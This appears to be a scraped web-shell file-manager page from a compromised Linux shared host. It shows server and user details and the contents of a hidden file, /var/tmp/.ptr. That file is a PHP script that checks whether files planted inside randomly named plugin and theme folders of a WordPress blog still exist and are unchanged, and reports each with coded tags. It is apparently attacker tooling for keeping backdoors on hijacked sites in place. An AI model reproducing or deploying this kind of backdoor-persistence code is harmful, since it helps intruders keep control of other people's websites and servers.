HEX
Server: Apache
System: Linux iad1-shared-b8-39 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
User: galmanza (2396195)
PHP: 8.0.30
Disabled: NONE
Upload Files
File: //var/tmp/.ptr
<?php   $r = '/home/denisburns/blog'; $x = ["/wp-content/plugins/seo-1757840616/wp-config.php"=>"bd@@457711@@967",
"/wp-content/themes/search-template-1757690527/wp-config-sample.php"=>"bd@@452090@@727"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');